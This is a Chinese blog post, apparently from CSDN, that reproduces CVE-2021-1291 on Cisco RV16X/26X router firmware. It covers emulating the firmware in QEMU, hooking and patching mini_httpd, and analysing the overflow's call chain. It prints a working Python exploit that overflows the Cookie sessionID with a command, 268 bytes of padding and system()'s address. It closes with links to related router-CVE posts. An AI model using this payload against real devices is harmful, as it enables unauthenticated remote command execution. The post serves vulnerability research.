Cisco漏洞复现(CVE-2021-1291)

原创 已于 2024-09-18 15:22:14 修改 · 1.4k 阅读 · 5 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#物联网 #安全性测试
于 2023-08-29 16:28:26 首次发布

Cisco漏洞复现(CVE-2021-1291)

漏洞复现

环境

• 虚拟机:AttifyOS3.0(Ubuntu18)
百度云盘AttifyOS下载地址:https://pan.baidu.com/s/1Vracsnlt5uNbdmfYK4dp8Q
密码:tvoh
• 固件版本:RV16X_26X-v1.0.01.01-2020-08-17-11-09-01-AM
• 工具:IDA、binwalk、arm-gcc
• Linux内核和硬盘映像
下载地址:https://people.debian.org/~aurel32/qemu/armhf/

步骤

  1. 固件解压
binwalk -Me RV16X_26X-v1.0.01.01-2020-08-17-11-09-01-AM.img
  1. 固件模拟
//配置网络通信
sudo tunctl -t tap0
sudo ifconfig tap0 192.168.234.131/24 up
//启动虚拟机 密码root
sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2" -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic
//配置qemu虚拟机网络
ifconfig eth0 192.168.234.132/24

漏洞程序为mini_httpd,虚拟机环境与真实设备有区别,需对程序进行库函数拦截及打patch。
程序中setsocket函数会出现错误,重新编写库函数setsocket,并进行交叉编译。

#include <stdio.h>
#include <stdlib.h>
#include<sys/socket.h>
int setsockopt(int sockfd, int level, int optname, const void *optval, socklen_t optlen){
    return 1;
}

arm-linux-gnueabi-gcc -shared -fPIC hook.c -o hook.so

在这里插入图片描述

启动程序会出现403页面,搜索关键字,确定问题点,用IDA对程序目标位置进行修改。
源指令为cmp R3,#0,由于R3为0,弹出403页面,讲指令修改为cmp R3,#1可满足跳转条件。
在这里插入图片描述

//将固件、hook程序、打过patch的程序传入qemu虚拟机,命令报错在命令前加sudo
scp -r ./rootfs root@192.168.234.132:/root/
scp -r ./mini_httpd  root@192.168.234.132:/root/rootfs/
scp -r ./hook.so root@192.168.234.132:/root/rootfs/
//启动服务(qemu虚拟机进行)
chroot ./rootfs sh
LD_PRELOAD='hook.so' ./mini_httpd

payload


import requests

url = "http://192.168.2.2"
cmd="ls"//执行的命令
payload = ("sessionID="+cmd+";").ljust(268,"a")+"\x1c\xb1\x01" 
url= url+"/help"
head= {'Cookie':payload}
r=requests.get(url,headers=head,verify=False)

漏洞分析

漏洞触发点位于web端,先考虑httpd程序,官网公告漏洞在固件v1.0.01.02版本被修复。对修复前后程序进行对比发现,漏洞函数为sub_15CE4,溢出变量为src,与a1、a2有关,通过函数调用链溯源。
调用链为sub_15CE4← sub_16138 ← sub_1625C ← sub_16F60 ← sub_11FA0
在这里插入图片描述

a1为sub_1625C的参数a1,a1为sub_16F60变量dword_35190,dword_35190为请求Cookie的Value。
在这里插入图片描述

在这里插入图片描述

确定溢出点为Cookie中的Session变量。在获得Session值之前存在空格过滤与请求校验。dword_35164为请求文件名字符串的指针。请求对象需满足sub_169F0中要求。sub_16138对Session值进行空格过滤。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

漏洞点函数地址空间大小为256+34=268
256为s数组的大小,34为三个指针的大小。
在地址空间后用system函数地址覆盖返回地址,函数返回时r0为栈中内容,故将待执行指令放入Session中。
故payload需满足待执行命令加填充字符长度为268,后为system地址。

CVE-2020-3187漏洞复现
初岄的博客
06-07 2956
CVE-2020-3187漏洞复现
复现CVE-2020-3452(CISCO ASA远程任意文件读取)
记录并分享学习安全的知识点..
04-27 1398
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 Cisco官方 发布了 Cisco ASA 软件和 FTD 软件的 Web 接口存在目录遍历导致任意文件读取 的风险通告,该漏洞编号为 CVE-2020-3452。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 漏洞等级:中危。 二、影响版本 Cisco ASA:<= 9.6 Cisco ASA:9.7 ,...
渗透测试练习靶场汇总
热门推荐
Thunderclap的博客
07-01 2万+
渗透测试 练习常用靶场汇总
从零到一:实战复现华为路由器CVE-2017-17215远程代码执行漏洞
最新发布
weixin_30329623的博客
03-21 81
本文详细介绍了如何从零开始复现华为路由器CVE-2017-17215远程代码执行漏洞。通过环境准备、固件解包、QEMU模拟环境搭建、路由器系统配置到漏洞利用与验证的全过程,帮助安全研究人员深入理解该漏洞的原理与危害,提升漏洞复现能力。
第一个iot漏洞分析d-link 850L路由器漏洞分析
九层台
03-26 3541
ftp://ftp2.dlink.com/PRODUCTS/DIR-850L/REVA/DIR-850L_REVA_FIRMWARE_1.14.B07_WW.ZIP固件下载地址 分析工具 1.attifyOs虚拟机(里面的~/tools/firmware-analysis-toolkit工具) 2.binwalk binwalk -eM xxx.bin解压查看bin文件系统 3.Ghidra...
Pwn2Own Austin 2021 Cisco RV34x RCE 漏洞复现
2023年最新地推相关信息
03-07 486
思科满分漏洞可使黑客以root身份运行任意命令
smellycat000的专栏
11-07 635
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士思科修复了一个CVSS评分为10分的漏洞 (CVE-2024-20418),它可导致攻击者以 root 权限在为工业无线自动化提供连接的易受攻击的 URWB 访问点上运行命令。该漏洞位于思科Unified Industrial Wireless Software 的 web 管理接口中。未认证的威胁行动者可在复杂度低的命令注入攻击中利用该漏洞,而...
cisco设备信息泄漏漏洞案例【二】
蚁景网安学院
10-28 3255
前言上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备的漏洞案例。CISCO-UCM ConfigFileCacheList.txt 泄漏CISCO-UCM 全称Cisco Unified Communications Manager,是用于集成CISCO的语音视频通话、消息传递和移动协作的基础设施部分 CUCM 服务器在端口 TCP/6970 上有一个...
AttifyOS v3.0 路由qemu模拟环境的使用
want的博客
01-31 3528
1.打开环境是这样的 2.修改root密码为attify直接使用 3.运行python3 fat.py 固件后,qemu模拟器自动开启运行,固件使用自带目录下的zip文件,运行成功如下:
ubuntu18.04 & AttifyOSv3.0
Hepburn_Sunsir的博客
08-20 756
1,查看版本信息 cat /proc/version 2,使用burpsuit /usr/bin/java -Xmx2g -jar burpsuite_free_v1.7.23.jar 3,使用 wireshark sudo wireshark
复现 DLink DIR-859 RCE 漏洞CVE-2019–20215)
wcwdnmdnmd的博客
12-20 2011
复现 DLink DIR-859 RCE 漏洞CVE-2019–20215)漏洞介绍漏洞影响漏洞等级环境搭建模拟攻击漏洞原理解决方案 漏洞介绍 该漏洞允许远程攻击者通过 urn 执行任意操作系统命令:到 /htdocs/cgibin 中 ssdpcgi()中的 M-SEARCH 方法,因为 REMOTE_PORT 处理不当。urn: service/device 的值使用 strstr 函数进行检查,该函数允许攻击者连接由 shell 元字符分隔的任意命令。 漏洞影响 D-Link DIR-859 1.0
firmadyne模拟运行DIR-850L固件
HuaSir的博客
02-16 1446
参考资料 https://blog.csdn.net/Mira_Hu/article/details/103887248 https://github.com/firmadyne/firmadyne#compiling-from-source https://blog.csdn.net/qq_26093511/article/details/78754574 坑点说明 Ubuntu14.04环境...
物联网安全入门 01固件仿真逆向环境搭建
没有网络安全,就没有国家安全
09-03 3519
物联网固件仿真环境搭建
D-link路由器仿真——fat.py
The54No1的博客
03-06 1275
下载实验所需虚拟机及固件。安装AttifyOS虚拟机并将固件放置在虚拟机内。执行fat.py进行仿真。验证仿真结果。
动态分析IoT固件(三)
weixin_43047908的博客
08-16 1775
目录前言 前言 动态分析固件之前,需要先把固件运行起来,但我们手头又没有路由器、摄像头之类的物联网硬件,该如何运行呢?这就需要虚拟执行,虚拟执行你就把它想象成一个虚拟机可以运行各种物联网OS就是了。 QEMU这个模拟器想必都不陌生,一个近乎能够模拟所有硬件设备的软件,而Firmadyne这个工具,是一个基于QEMU的分析平台,包含模拟、固件提取、调试等功能。 但该工具很难安装,在kali上安装一直报错,人麻了。。。最终选择用attifyti提供的物联网渗透专用虚拟机,下载下来的文件直接用vmware导入就行
AttifyOS v3.0 基本使用
prettyX的博客
05-29 2739
项目地址:https://github.com/adi0x90/attifyos 虚拟机运行起来后如下 进入Tools文件夹 输入如下命令 python3 fat.py 'WNAP320 Firmware Version 2.0.3.zip' 成功模拟运行,后续可以开始相关的调试、分析工作 ...
Tenda AC15路由器仿真——IDA+QEMU
The54No1的博客
03-07 2949
使用IDA对tenda AC15路由器进行仿真
HG532e路由器远程命令执行漏洞复现
qq_41326328的博客
09-29 2458
最近一直在复现关于路由器的漏洞,前俩天复现了D-link的某款溢出漏洞,感觉做起来有很多坑,一般都是搭建环境造成的坑,在这以华为HG532e的远程命令执行的漏洞做出详细的步骤,供大家参考。我是个IOT新手,发文章一来是想把自己的实验记录一下,二来能够分享和交流一下技术和经验。
Cisco RV340命令执行漏洞CVE-2022-20707)及关联历史漏洞分析
C20220511的博客
05-18 2683
本篇文章主要是对Cisco RV340命令执行漏洞(CVE-2022-20707)进行的研究分析,尽管利用此漏洞需要身份验证,但可以通过CVE-2022-20705绕过现有的身份验证机制实现无条件的命令执行。历史相关的漏洞还包括:CVE-2020-3451、CVE-2021-1473、CVE-2021-1472,我们会逐一进行分析。
Cisco Small Business RV 路由器多个高危漏洞通告
爱国小白帽
04-09 1087
报告编号:B6-2021-040801 报告来源:360CERT 报告作者:360CERT 更新日期:2021-04-08 0x01 漏洞简述 2021年04月08日,360CERT监测发现Cisco发布了Cisco Small Business RV Series Routers多个漏洞的风险通告,漏洞编号为CVE-2021-1472,CVE-2021-1473,漏洞等级:高危,漏洞评分:8.5。 对此,360CERT建议广大用户及时将Cisco Rv VPN 路由器升级到最新版本。与此同时,请做好资.
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值